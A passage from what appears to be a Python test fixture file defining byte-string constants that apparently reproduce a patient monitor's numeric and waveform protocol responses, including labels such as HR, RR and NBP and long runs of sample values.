b"\x1f\xe5\x1f\xe3\x1f\xe3\x1f\xe5\x1f\xe3\x1f\xe3\x1f\xe1\x1f\xe1" \ b"\x1f\xdf\x1f\xdf\x1f\xdd\x1f\xdb\x1f\xdb\x1f\xdb\x1f\xdb\x1f\xdd" \ b"\x1f\xdd\x1f\xdf\x1f\xe1\x1f\xe1\x1f\xe1\x1f\xe3\x1f\xe3\x1f\xe5" \ b"\x1f\xe7\x1f\xe7\x1f\xe9\x1f\xe9\x1f\xeb\x1f\xeb\x1f\xed\x1f\xed" \ b"\x1f\xed\x1f\xef\x1f\xef\x1f\xf1\x1f\xf1\x1f\xf3\x1f\xf3\x1f\xf5" \ b"\x1f\xf5\x1f\xf5\x1f\xf7\x1f\xf9\x1f\xf9\x1f\xfb\x1f\xfd\x1f\xff" \ b"\x1f\xfd\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff" # 4th group of responses rsp_nu_4_no_1 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x04\x1c\x01\x01\x00\x01\x00\x07\x04\x14\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x04\x0a\x00\x01\x00\x00\x0e\x80\x2f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x03\xf0\x00\x00" \ b"\x00\x0a\x03\xea\x86\x3f\x00\x07\x00\x46\x09\x21\x00\x02\x86\x3f" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x58\x04" \ b"\x09\x27\x00\x10\x00\x0e\x00\x43\x00\x50\x00\x50\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x05" \ b"\x86\x58\x00\x07\x00\x46\x09\x21\x00\x02\x86\x58\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xe0\x18\x09\x27\x00\x10" \ b"\x00\x0e\x03\x94\x6e\x29\xfe\xff\x5e\xa6\xfe\xff\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x03\x01\x09\x11\x00\x02\x00\x02\x87\x8c\x00\x09" \ b"\x00\x5a\x09\x21\x00\x02\x87\x8c\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x4b\xb8\x09\x27\x00\x10\x00\x0e\x00\x53" \ b"\x00\x70\x00\x4f\x20\x82\x00\x20\x00\x20\x00\x00\x09\x17\x00\x02" \ 
b"\x03\x00\x09\x11\x00\x02\x00\x06\xf0\x08\x00\x02\x06\xd1\x09\x50" \ b"\x00\x0a\x4b\xb8\x04\x00\x02\x20\xff\x00\x03\xb6\x87\x92\x00\x07" \ b"\x00\x4e\x09\x21\x00\x02\x87\x92\x09\x2f\x00\x04\x00\x01\x00\x06" \ b"\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00" \ b"\x09\x24\x00\x04\x00\x02\x48\x22\x09\x27\x00\x10\x00\x0e\x81\x09" \ b"\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02" \ b"\x00\x06\x09\x50\x00\x0a\x48\x22\x04\x01\x0a\xa0\x00\x00\x00\x3c" \ b"\x87\x96\x00\x08\x00\x54\x09\x21\x00\x02\x87\x96\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x4b\xb0\x09\x27\x00\x10" \ b"\x00\x0e\x70\x4c\xfe\xff\x6c\xe8\xfe\xff\x00\x20\x00\x20\x00\x00" \ b"\x09\x17\x00\x02\x02\x01\x09\x11\x00\x02\x00\x06\x09\x50\x00\x0a" \ b"\x4b\xb0\x04\x00\x02\x00\xff\x00\x00\x64\x87\xe6\x00\x0a\x00\x82" \ b"\x09\x21\x00\x02\x87\xe6\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x52\x28\x01\x03\x00\x00\x09\x24" \ b"\x00\x04\x00\x02\x4a\x04\x09\x27\x00\x10\x00\x0e\x00\x4e\x00\x42" \ b"\x00\x50\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x01" \ b"\x09\x90\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf2\x37\x00\x04" \ b"\xff\xff\xff\xff\xf9\x98\x00\x04\xff\xff\xff\xff\x09\x4b\x00\x22" \ b"\x00\x03\x00\x1e\x4a\x05\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x06" \ b"\x20\x00\x0f\x20\x00\x7f\xff\xff\x4a\x07\x20\x00\x0f\x20\x00\x7f" \ b"\xff\xff\x87\xe9\x00\x0a\x00\x68\x09\x21\x00\x02\x87\xe9\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x52\x28\x00\x01\x00\x00\x09\x24\x00\x04\x00\x02\xf0\xe5\x09\x27" \ b"\x00\x10\x00\x0e\x81\x09\xfe\xff\x64\x0f\xfe\xff\x00\x20\x00\x20" \ b"\x00\x00\x09\x17\x00\x02\x03\x00\x09\x11\x00\x02\x00\x01\x09\x90" \ b"\x00\x08\x20\x19\x03\x21\x16\x30\x43\x00\xf9\x98\x00\x04\xff\xff" \ b"\xff\xff\x09\x50\x00\x0a\xf0\xe5\x20\x00\x0a\xa0\x00\x7f\xff\xff" \ 
b"\x88\x16\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x16\x09\x2f\x00\x04" \ b"\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28" \ b"\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x41\x82\x09\x27\x00\x10" \ b"\x00\x0e\x00\x48\x00\x52\x00\x20\x00\x20\x00\x20\x00\x20\x00\x00" \ b"\x09\x11\x00\x02\x00\x02\x09\x50\x00\x0a\x41\x82\x04\x00\x0a\xa0" \ b"\x00\x00\x00\x3c\x88\x1d\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x1d" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x50\x0a" \ b"\x09\x27\x00\x10\x00\x0e\x00\x52\x00\x52\x00\x20\x00\x20\x00\x20" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x03\x09\x50\x00\x0a\x50\x0a" \ b"\x04\x00\x0a\xe0\x00\x00\x00\x0f\x88\x22\x00\x08\x00\xa0\x09\x21" \ b"\x00\x02\x88\x22\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x01\x0c\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x03\x00\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x00\x20" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x09\x4b" \ b"\x00\x54\x00\x08\x00\x50\x03\x01\x84\x00\x05\x12\x00\x7f\xff\xff" \ b"\x03\x02\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3d\x84\x00\x05\x12" \ b"\x00\x7f\xff\xff\x03\x3e\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x3f" \ b"\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x40\x84\x00\x05\x12\x00\x7f" \ b"\xff\xff\x03\x04\x84\x00\x05\x12\x00\x7f\xff\xff\x03\x07\x84\x00" \ b"\x05\x12\x00\x7f\xff\xff\x09\x91\x00\x04\x0e\x7e\xf0\x00" rsp_nu_4_no_2 = \ b"\xe1\x00\x00\x02\x00\x05" \ b"\x02\x50\x03\x02\x00\x01\x00\x07\x02\x48\x00\x21\x00\x00\x00\x00" \ b"\xf1\x3b\x02\x3e\x00\x01\x00\x00\x0e\x80\x2f\x00\xff\xff\xff\xff" \ b"\xff\xff\xff\xff\x00\x01\x00\x06\x00\x00\x00\x01\x02\x24\x00\x00" \ b"\x00\x09\x02\x1e\x88\x28\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x28" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x24\x00\x01\x0c\x00\x80\x88\x2a\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x2a\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ 
b"\x00\x00\x20\x00\x00\x05\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\xf0\x3d\x09\x27\x00\x10\x00\x0e\x00\x53\x00\x54\x63\x07" \ b"\xfe\xff\x65\x70\xfe\xff\x00\x00\x09\x11\x00\x02\x00\x02\x88\x2f" \ b"\x00\x07\x00\x4e\x09\x21\x00\x02\x88\x2f\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\x42\x61\x09\x27\x00\x10\x00\x0e" \ b"\x00\x50\x00\x56\x00\x43\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x09\x50\x00\x0a\x42\x61\x04\x00\x0a\xa0\x00\x00" \ b"\x00\x00\x88\x3c\x00\x06\x00\x40\x09\x21\x00\x02\x88\x3c\x09\x2f" \ b"\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01" \ b"\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\x3f\x20\x09\x27" \ b"\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x20\x00\x20\x00\x20\x00\x20" \ b"\x00\x00\x09\x11\x00\x02\x00\x02\x88\x3e\x00\x06\x00\x40\x09\x21" \ b"\x00\x02\x88\x3e\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c" \ b"\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04" \ b"\x00\x02\x3f\x24\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x63" \ b"\x00\x20\x00\x20\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x40" \ b"\x00\x06\x00\x40\x09\x21\x00\x02\x88\x40\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x42\x28\x00\x00" \ b"\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x56\x09\x27\x00\x10\x00\x0e" \ b"\x03\x94\x00\x51\x00\x54\x00\x63\x00\x20\x00\x20\x00\x00\x09\x11" \ b"\x00\x02\x00\x02\x88\x42\x00\x06\x00\x40\x09\x21\x00\x02\x88\x42" \ b"\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00" \ b"\x00\x01\x42\x28\x00\x00\x00\x00\x09\x24\x00\x04\x00\x02\xf1\x54" \ b"\x09\x27\x00\x10\x00\x0e\x00\x51\x00\x54\x00\x2d\x00\x48\x00\x52" \ b"\x00\x20\x00\x00\x09\x11\x00\x02\x00\x02\x88\x46\x00\x03\x00\x1e" \ b"\x09\x21\x00\x02\x88\x46\x09\x2f\x00\x04\x00\x01\x00\x06\x09\x3f" \ b"\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00\x00\x80\x88\x48" \ 
b"\x00\x03\x00\x1e\x09\x21\x00\x02\x88\x48\x09\x2f\x00\x04\x00\x01" \ b"\x00\x06\x09\x3f\x00\x0c\x00\x00\x20\x00\x00\x01\x24\x00\x00\x00" \ b"\x00\x80" rsp_nu_4_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x00\x2a\x00\x01\x00\x07\x00\x24\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x00\x1a\x00\x01\x00\x00\x0e\x80\x2f\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x06\x00\x00\x00\x00\x00\x00" rsp_wave_4_no_1 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x01\x2e\x00\x04\x00\x07\x01\x28\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x01\x1e\x00\x03\x00\x00\x0e\x80\x00\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x01\x04\x00\x00\x00\x02" \ b"\x00\xfe\x08\x11\x00\x0f\x00\xa8\x09\x21\x00\x02\x08\x11\x09\x2f" \ b"\x00\x04\x00\x01\x00\x09\x09\x3f\x00\x0c\x00\x00\x08\x00\x00\x01" \ b"\x42\x80\x00\x00\x00\x00\x09\x6d\x00\x06\x00\x80\x10\x0e\x30\x00" \ b"\x0a\x16\x00\x14\x00\x04\x00\x10\x00\x04\x80\x08\x00\x03\x40\x01" \ b"\x00\x02\x80\x04\x00\x05\x40\x02\x09\x8d\x00\x04\x00\x00\x00\x10" \ b"\x09\x24\x00\x04\x00\x02\x01\x3d\x09\x27\x00\x10\x00\x0e\x00\x49" \ b"\x00\x49\x00\x49\x00\x20\x00\x20\x00\x20\x00\x00\x09\x96\x00\x02" \ b"\x10\xb2\x09\x45\x00\x02\x02\x40\x09\x11\x00\x02\x00\x02\x09\x40" \ b"\x00\x02\x00\x00\x09\x6f\x00\x0c\xfe\xff\xf0\x00\xfd\x00\x9f\xfb" \ b"\x00\x00\x3f\xff\x09\x64\x00\x10\x00\x00\x00\x00\x00\x00\x00\x01" \ b"\x1f\xca\x20\x92\x00\x00\x00\x00\x09\x6a\x00\x04\x1e\x9e\x21\xbe" \ b"\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00\x00\x40" \ b"\x06\x1f\x06\x1d\x06\x1a\x06\x15\x06\x0e\x06\x05\x05\xfb\x05\xef" \ b"\x05\xe0\x05\xd0\x05\xbe\x05\xab\x05\x95\x05\x7f\x05\x66\x05\x4d" \ b"\x05\x33\x05\x18\x04\xfc\x04\xe1\x04\xc6\x04\xab\x04\x91\x04\x78" \ b"\x04\x60\x04\x4b\x04\x37\x04\x26\x04\x18\x04\x0d\x04\x05\x04\x01" rsp_wave_4_no_2 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x01\x0e\x80\x08\x00\xff\xff\xff\xff\xff\xff" \ 
b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x07\x8e\x00\x01\x00\x4a\x09\x6e\x00\x46\x4b\xb4\x04\x00" \ b"\x00\x40\x04\x00\x04\x04\x04\x0b\x04\x18\x04\x28\x04\x3e\x04\x57" \ b"\x04\x76\x04\x99\x04\xc0\x04\xec\x05\x1d\x05\x51\x05\x89\x05\xc5" \ b"\x06\x05\x06\x47\x06\x8c\x06\xd3\x07\x1c\x07\x67\x07\xb3\x07\xff" \ 
b"\x08\x4c\x08\x99\x08\xe4\x09\x2f\x09\x78\x09\xbf\x0a\x03\x0a\x44" \ b"\x0a\x83" rsp_wave_4_no_3 = \ b"\xe1\x00\x00\x02\x00\x02" \ b"\x03\xb0\x00\x04\x00\x07\x03\xaa\x00\x21\x00\x00\x00\x00\xf1\x3b" \ b"\x03\xa0\x00\x03\x00\x02\x0e\x80\x10\x00\xff\xff\xff\xff\xff\xff" \ b"\xff\xff\x00\x01\x00\x09\x00\x00\x00\x01\x03\x86\x00\x00\x00\x04" \ b"\x03\x80\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x02\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa1\x94\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xff\x20\x04\x20\x0c\x20\x14\x20\x1c\x20\x26\x20\x2f" \ b"\x20\x38\x20\x42\x20\x4b\x20\x55\x20\x5e\x20\x68\x20\x71\x20\x7a" \ b"\x20\x83\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x01\x04\x00" \ b"\x01\x00\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ 
b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\xa0\x84\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd\x1f\xfd" \ b"\x1f\xfd\x1f\xfd\x1f\xfe\x20\x00\x20\x02\x20\x06\x20\x08\x20\x0b" \ b"\x20\x0e\x20\x10\x20\x13\x20\x17\x20\x18\x20\x1a\x20\x1d\x20\x20" \ b"\x20\x23\x08\x11\x00\x01\x01\x0a\x09\x6e\x01\x06\x01\x3d\x04\x00" \ b"\x01\x00\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\xa1\x04\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ b"\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff\x1f\xff" \ 